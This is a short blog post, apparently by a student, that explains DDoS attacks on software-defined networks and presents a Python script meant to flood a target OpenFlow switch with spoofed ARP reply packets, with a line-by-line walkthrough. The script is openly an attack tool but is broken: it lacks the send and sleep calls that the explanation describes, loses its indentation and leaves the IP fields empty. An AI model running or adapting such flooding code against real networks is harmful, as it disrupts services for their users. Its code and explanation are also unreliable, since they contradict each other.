DDoS Attack Script for SDN Environment

Muhammad Ghazy
4 min readJan 27, 2023


DDoS stands for Distributed Denial of Service. It is a type of cyber attack that aims to make a website or network resource unavailable to its intended users by overwhelming it with a large amount of traffic from multiple sources. The goal of a DDoS attack is to flood a target with so much traffic that it is unable to handle it, causing the website or network resource to become slow or unresponsive. This can be accomplished by using a botnet, which is a group of compromised computers that are controlled by an attacker to carry out the attack.

DDoS attacks can be launched using a variety of methods, such as by overwhelming a website with HTTP requests, flooding a network with UDP or ICMP packets, or by exploiting vulnerabilities in the target’s infrastructure. These attacks can cause significant damage to the availability and performance of the targeted services and can also cause a significant financial loss.

In Software-Defined Network (SDN) environment, DDoS attacks on software-defined networks (SDNs) can have a similar impact as DDoS attacks on traditional networks. They can cause availability issues and slow down the network performance. The primary difference is that in SDN, the control plane is separated from the data plane, and the control plane is responsible for making forwarding decisions.

There are several methods that attackers can use to launch DDoS attacks on SDNs, such as:

  1. Flooding the controller: By overwhelming the SDN controller with a large number of fake requests, the attacker can cause the controller to become unavailable, resulting in a lack of forwarding decisions and network disruption.
  2. Attacking the southbound interface: An attacker can flood the southbound interface of an SDN controller with a large number of fake requests, causing the controller to become overwhelmed and unavailable.
  3. Exhausting resources: An attacker can consume resources such as CPU, memory, or storage on the controller or on the switches in the network, causing them to become unavailable.
  4. Spoofing: An attacker can spoof the source IP address in packets to launch a DDoS attack, making it difficult to trace the attack back to its source.
  5. Flooding the data plane: An attacker can launch a DDoS attack by flooding the data plane with a large number of packets, causing the switches to become overwhelmed and unavailable.

So here’s an example of DDoS Script for SDN :

import socket, random, time
from ryu.lib import packet

s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0800))

# Prompt the user for the target OpenFlow switch's MAC address
mac_address = input("Enter Target Switch MAC Address: ")
sleep = float(input("Sleep: "))

# Create an OpenFlow packet
for i in range(1, 100**1000):
pkt = packet.Packet()
pkt.add_protocol(packet.ethernet(ethertype=0x0806, dst=mac_address))
pkt.add_protocol(packet.arp(opcode=2, src_mac='00:11:22:33:44:55', src_ip='',
dst_mac=mac_address, dst_ip=''))
print(f"Send: {i}", end='\r')

This script is using the socket, random and time libraries in Python to create and send ARP packets to a target OpenFlow switch.

The first line imports the necessary libraries for the script to run.

The second line creates a socket using the socket.AF_PACKET (address family packet) and socket.SOCK_RAW (raw socket) address families, with a protocol of socket.htons(0x0800) which is the protocol for the Internet Protocol (IP).

The next line prompts the user to enter the target OpenFlow switch’s MAC address, which is then stored in the variable “mac_address”. The next line prompts the user to enter the sleep time between packets.

The following for loop is used to create and send an OpenFlow packet 100**1000 times, which is a very large number of packets, so it’s likely that the script is intended to be run only once and not as a loop.

The loop starts by creating an instance of the packet.Packet class called “pkt”. Then, it adds an Ethernet protocol to the packet with the ethertype 0x0806, which is the ethertype for ARP, and sets the destination MAC address to the target OpenFlow switch’s MAC address.

Then it adds an ARP protocol to the packet with opcode 2 (ARP reply), source MAC address ‘00:11:22:33:44:55’, source IP address ‘’, destination MAC address set to the target switch’s MAC address, and destination IP address set to ‘’.

Finally, it sends the packet using the socket and prints the iteration count, and wait for the time entered by the user before sending another packet.

It’s important to note that this script might not work as expected because it uses the low-level socket library, which might require root or administrator privileges to run and might not be allowed in some networks. Also this script may cause a Denial of Service (DoS) attack on the switch if it’s not properly configured.



Muhammad Ghazy
Muhammad Ghazy

Written by Muhammad Ghazy


An ordinary CS Student.

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